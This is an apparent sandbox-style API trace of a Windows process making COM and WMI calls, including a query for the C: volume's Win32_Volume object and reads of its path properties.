	[0195.984] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807418, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0195.984] WbemLocator:IUnknown:Release (This=0x1b807418) returned 0x3
	[0195.984] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0195.984] WbemLocator:IUnknown:AddRef (This=0x1b807530) returned 0x4
	[0195.984] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b807500) returned 0x0
	[0195.985] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x4
	[0195.985] WbemLocator:IRpcOptions:Query (in: This=0x1b807500, pPrx=0x1b807530, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0195.985] WbemLocator:IUnknown:Release (This=0x1b807500) returned 0x3
	[0195.985] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x2
	[0195.985] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0195.985] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0195.985] WbemLocator:IUnknown:AddRef (This=0x1b807530) returned 0x3
	[0195.985] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c834808) returned 0x0
	[0195.985] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x3
	[0196.003] WbemLocator:IUnknown:Release (This=0x1c834808) returned 0x2
	[0196.004] WbemLocator:IUnknown:Release (This=0x1c834808) returned 0x1
	[0196.004] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0196.004] WbemLocator:IUnknown:AddRef (This=0x1b807530) returned 0x2
	[0196.004] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b807530) returned 0x0
	[0196.004] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x2
	[0196.005] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x1
	[0196.005] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0196.005] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0196.005] WbemLocator:IUnknown:AddRef (This=0x1b807530) returned 0x2
	[0196.005] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807530, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c834808) returned 0x0
	[0196.005] WbemLocator:IUnknown:Release (This=0x1b807530) returned 0x2
	[0196.005] WbemLocator:IUnknown:AddRef (This=0x1c834808) returned 0x3
	[0196.006] IWbemServices:ExecQuery (in: This=0x1c834808, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c8381d8) returned 0x0
	[0196.044] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c8381e0) returned 0x0
	[0196.044] IClientSecurity:QueryBlanket (in: This=0x1c8381e0, pProxy=0x1c8381d8, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0196.044] IUnknown:Release (This=0x1c8381e0) returned 0x1
	[0196.044] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b8070b0) returned 0x0
	[0196.044] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c8381e0) returned 0x0
	[0196.045] IClientSecurity:SetBlanket (This=0x1c8381e0, pProxy=0x1c8381d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.047] IUnknown:Release (This=0x1c8381e0) returned 0x2
	[0196.047] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x1
	[0196.047] CoTaskMemFree (pv=0x1b81e590) 
	[0196.047] IUnknown:QueryInterface (in: This=0x1c8381d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b8070b0) returned 0x0
	[0196.048] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0196.048] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0196.049] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0196.049] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0196.049] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b806f98) returned 0x0
	[0196.050] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b806f98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.050] WbemLocator:IUnknown:Release (This=0x1b806f98) returned 0x3
	[0196.050] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0196.050] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x4
	[0196.050] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b807080) returned 0x0
	[0196.050] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x4
	[0196.050] WbemLocator:IRpcOptions:Query (in: This=0x1b807080, pPrx=0x1b8070b0, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0196.050] WbemLocator:IUnknown:Release (This=0x1b807080) returned 0x3
	[0196.051] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0196.051] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0196.051] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0196.051] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x3
	[0196.051] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c8381d8) returned 0x0
	[0196.051] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x3
	[0196.051] IUnknown:Release (This=0x1c8381d8) returned 0x2
	[0196.051] IUnknown:Release (This=0x1c8381d8) returned 0x1
	[0196.051] WbemLocator:IUnknown:Release (This=0x1c834808) returned 0x2
	[0196.052] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c834510, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0196.052] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0196.052] WbemDefPath:IWbemPath:GetText (in: This=0x1c834510, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.052] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0196.052] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0196.052] WbemLocator:IUnknown:AddRef (This=0x1b8070b0) returned 0x2
	[0196.052] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8070b0, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c8381d8) returned 0x0
	[0196.052] WbemLocator:IUnknown:Release (This=0x1b8070b0) returned 0x2
	[0196.052] IUnknown:AddRef (This=0x1c8381d8) returned 0x3
	[0196.052] IEnumWbemClassObject:Clone (in: This=0x1c8381d8, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c838368) returned 0x0
	[0196.054] IUnknown:QueryInterface (in: This=0x1c838368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c838370) returned 0x0
	[0196.054] IClientSecurity:QueryBlanket (in: This=0x1c838370, pProxy=0x1c838368, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0196.054] IUnknown:Release (This=0x1c838370) returned 0x1
	[0196.054] IUnknown:QueryInterface (in: This=0x1c838368, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b807830) returned 0x0
	[0196.054] IUnknown:QueryInterface (in: This=0x1c838368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c838370) returned 0x0
	[0196.054] IClientSecurity:SetBlanket (This=0x1c838370, pProxy=0x1c838368, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.056] IUnknown:Release (This=0x1c838370) returned 0x2
	[0196.056] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0196.056] CoTaskMemFree (pv=0x1b81e500) 
	[0196.056] IUnknown:QueryInterface (in: This=0x1c838368, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b807830) returned 0x0
	[0196.057] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0196.057] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0196.058] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0196.058] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0196.058] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b807718) returned 0x0
	[0196.059] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807718, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.059] WbemLocator:IUnknown:Release (This=0x1b807718) returned 0x3
	[0196.059] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0196.059] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x4
	[0196.059] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b807800) returned 0x0
	[0196.059] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x4
	[0196.059] WbemLocator:IRpcOptions:Query (in: This=0x1b807800, pPrx=0x1b807830, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0196.059] WbemLocator:IUnknown:Release (This=0x1b807800) returned 0x3
	[0196.060] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0196.060] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0196.060] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0196.060] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0196.060] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c838368) returned 0x0
	[0196.060] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x3
	[0196.060] IUnknown:Release (This=0x1c838368) returned 0x2
	[0196.060] IUnknown:Release (This=0x1c838368) returned 0x1
	[0196.060] IUnknown:Release (This=0x1c8381d8) returned 0x2
	[0196.061] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0196.061] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0196.061] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x2
	[0196.061] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c838368) returned 0x0
	[0196.061] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0196.062] IUnknown:AddRef (This=0x1c838368) returned 0x3
	[0196.062] IEnumWbemClassObject:Reset (This=0x1c838368) returned 0x0
	[0196.063] IUnknown:Release (This=0x1c838368) returned 0x2
	[0196.063] CoTaskMemAlloc (cb=0x8) returned 0x1b804db0
	[0196.064] IEnumWbemClassObject:Next (in: This=0x1c838368, lTimeout=-1, uCount=0x1, apObjects=0x1b804db0, puReturned=0x1c80d0f8 | out: apObjects=0x1b804db0*=0x1c838410, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0196.140] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c838410) returned 0x0
	[0196.140] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0196.140] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0196.141] IUnknown:AddRef (This=0x1c838410) returned 0x3
	[0196.141] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0196.141] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c838418) returned 0x0
	[0196.141] IMarshal:GetUnmarshalClass (in: This=0x1c838418, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0196.141] IUnknown:Release (This=0x1c838418) returned 0x3
	[0196.141] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0196.141] IUnknown:AddRef (This=0x1c838410) returned 0x4
	[0196.141] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0196.141] IUnknown:Release (This=0x1c838410) returned 0x3
	[0196.142] IUnknown:Release (This=0x1c838410) returned 0x2
	[0196.142] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0196.142] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0196.142] IUnknown:AddRef (This=0x1c838410) returned 0x3
	[0196.142] IUnknown:QueryInterface (in: This=0x1c838410, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c838410) returned 0x0
	[0196.142] IUnknown:Release (This=0x1c838410) returned 0x3
	[0196.142] IUnknown:Release (This=0x1c838410) returned 0x2
	[0196.142] IUnknown:Release (This=0x1c838410) returned 0x1
	[0196.142] CoTaskMemFree (pv=0x1b804db0) 
	[0196.143] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0196.143] IUnknown:AddRef (This=0x1c838410) returned 0x2
	[0196.143] IWbemClassObject:Get (in: This=0x1c838410, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0196.143] IWbemClassObject:Get (in: This=0x1c838410, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0196.143] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0196.144] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0196.144] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0196.144] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0196.144] IUnknown:Release (This=0x181868) returned 0x1
	[0196.145] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c8318c0) returned 0x0
	[0196.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8318c0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0196.145] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8318c0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c83a150) returned 0x0
	[0196.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83a150, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c83a150) returned 0x0
